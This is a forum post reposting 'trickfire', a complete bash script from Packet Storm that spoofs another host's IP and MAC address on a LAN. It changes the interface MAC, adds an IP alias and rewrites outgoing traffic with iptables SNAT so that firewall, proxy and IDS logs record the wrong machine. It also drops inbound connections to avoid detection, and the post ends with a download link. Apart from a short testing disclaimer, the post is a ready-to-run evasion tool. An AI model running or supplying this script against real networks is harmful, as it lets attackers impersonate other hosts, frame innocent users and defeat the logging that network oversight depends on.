Jump to content
Raptor87

Trickfire Spoofing Script

By Raptor87, in Programe utile

Recommended Posts

Raptor87 Newbie

Raptor87

Posted
Posted

This is a simple bash script that makes spoofing a given host on a LAN easier in Linux.

Authored by Vittorio Milazzo

Systems | linux , unix



#!/bin/bash
# Version:  0.1 (24/07/2013)
# Author:  Vittorio Milazzo - vittorio.milazzo at gmail.com
#
# Notes:  Bash script that permit to spoof Lan connections
#     and deceive firewall,proxy,IDS/NIDS traffic logging.
#
# Prerequisite packages: macchanger, netfilter
# ============
# Intended use
# ============
# The script purpose is to test how is possible to deceive firewall/proxy/NIDS
logging in a local network.
# ==========
# Disclaimer
# ==========
# The author published this script and the information under the condition that them
# will not be used for to bring to himself or others a profit or to bring to others
damage.
# The author is not responsible for any damage or losses of any kind caused by the
use or
# misuse of the script and from the information contained therein.
# Author is not liable in any case of damage, including direct, indirect, incidental,
# consequential loss of business profits or special damages.
# =======
# Details
# =======
# Three-way handshake completition:
# This script assign ip alias ($spoof_ip) to network interface card, and change mac-
address
# using macchanger. After wich, iptables SNAT will send outgoing packets with ip
alias address
# and mac-address that we have changed. Hosts that will receive SYN spoofed packets,
# will response with ACK flags to our ip alias (so packets will reach us), and SYN/
ACK packets will be send
# from our ip alias to target hosts.
#
# BE CAREFULL:
# When spoofed ip/mac address is an alive host in our Lan, it may happen that both
(we and spoofed host)
# will lose some packets and some established connections will drop.
clear
BANNER="trickfire v.0.1: Spoofing Lan connection - Firewall and IDS/NIDS deception
logging"
#########################
# 1.) NETWORK VARIABLES #
#########################
# Set Lan default gateway ip address
router="192.168.0.200"
# Set network interface card used for spoofing
interface="eth0"
# Our real ip address
real_ip=`ifconfig eth0 | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1}';`
# Our authentic mac address
real_mac="c8:0a:a9:c0:49:a4"
##########################
# 2.) SPOOFING VARIABLES #
##########################
#
# VARIANTS:
#
# A.) SPOOF LAN CONNECTION AND DECEIVE INTERNET TRAFFIC LOGGING
#
# For deceive firewall/proxy or IDS/NIDS logging, you need to send spoofed packets to
their.
#
# But if you are not sure about firewall or Nids ip address, or you don't know if in
Lan there are some other NIDS
# or sniffer with ip address on a different class, will be better to send spoofed
packets to all (0/0).
# This setting will permit to spoof connection vs all Lan hosts too.
#
#
# B.) DECEIVE ONLY INTERNET TRAFFIC LOGGING
#
# Otherwise, if in your network is not present a proxy server or IDS/NIDS, or you are
not interested
# to test spoofing Lan connections, you can deceive Firewall Internet traffic logging
specifying your
# Lan class ID with net prefix. (Ex: lan_id="192.168.0.0/24").
# With this option, iptables SNAT doesn't will send spoofed packets on entire Lan
network ( ! -d $lan_id ),
# and spoofed packets will arrive (and will log) only from default gateway (firewall
or router).
#
# If you will use this setting, remember to comment/uncomment too appropriate
iptables command below (in functions section).
lan_id="0/0"
# Ip address that you want to spoof
spoof_ip="192.168.0.216"
# Mac address that you want to spoof
spoof_mac="ec:9a:74:64:f6:33"
#################
# 3.) FUNCTIONS #
#################
enable_spoof ()
      {
        ifconfig $interface down
        macchanger -m   $spoof_mac   $interface >/dev/null
        ifconfig $interface:1  $spoof_ip
        ifconfig $interface up
        # A.) SPOOF LAN CONNECTION AND DECEIVE INTERNET TRAFFIC LOGGING
        # Use this if you have set variable lan_id="0/0"
        #
        iptables -t nat -I POSTROUTING -d $lan_id -j SNAT --to  $spoof_ip
        # B.) DECEIVE ONLY INTERNET TRAFFIC LOGGING
        # Use this if you have set variable lan_id="x.x.x.x/net_prefix"
        # (and comment iptables command above).
        #
        #iptables -t nat -I POSTROUTING ! -d $lan_id -j SNAT --to  $spoof_ip
        # Block incoming connection (to avoid to be detected by possible listening
services)
        iptables -I INPUT -i $interface -d $spoof_ip -p tcp --syn -m state --state
NEW -j DROP
        iptables -I INPUT -i $interface -d $spoof_ip -p udp -m state --state NEW -j
DROP
        route add default gw $router
       }
disable_spoof ()
      {
         ifconfig $interface down >/dev/null
         macchanger -m $real_mac  $interface >/dev/null
         ifconfig $interface:1 down 2>/dev/null
         iptables -t nat -F
         ifconfig $interface  up
         echo -e "\033[0;32mDefault gateway: $router\033[m"
         route add default gw $router
      }
case "$1" in
start)
  echo; echo -e  "\033[31m$BANNER\033[m"; echo
  echo; echo -e "\033[31m- Spoofing started"; echo
  echo -e "\033[0;32mInterface:  $interface\033[m"
        echo -e "\033[0;32mSpoofed ip: $spoof_ip\033[m"
        echo -e "\033[0;32mSpoofed mac address: $spoof_mac\033[m"
        echo
  enable_spoof
  echo
        exit 0
            ;;
stop)
  echo; echo -e  "\033[31m$BANNER\033[m"; echo
  echo; echo -e "\033[31m- Spoofing stopped\033[m";echo
  echo -e "\033[31mBack to normal configuration:\033[m"; echo
        echo -e "\033[0;32mInterface:  $interface\033[m"
  echo -e "\033[0;32mIp address: $real_ip\033[m"
  echo -e "\033[0;32mMac adress: $real_mac\033[m"
  disable_spoof
  echo
  exit 0
  ;;
*)
  echo
  echo -e "
\033[31m#####################################################################\033[m"
  echo -e " \033[31m# trickfire
v.0.1                                                   #\033[m"
        echo -e "
\033[31m#                                                                   #\033[m"
  echo -e " \033[31m# Spoofing Lan connection - Firewall and IDS/NIDS deception
logging #\033[m"
        echo -e "
\033[31m#                                                                   #\033[m"
  echo -e " \033[31m# Vittorio Milazzo - vittorio.milazzo at
gmail.com                  #\033[m"
  echo -e "
\033[31m#####################################################################\033[m"
  echo;echo -e "\033[36m1.) Change variables inside the script\033[m"
  echo;echo -e "\033[36m2.) Usage: ./trickfire.sh {start|stop}\033[m"
  echo
   exit 1
  ;;
esac
exit 0

Download Link:

http://packetstormsecurity.com/files/download/122544/trickfire.sh.txt

Source:

Trickfire Spoofing Script ? Packet Storm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...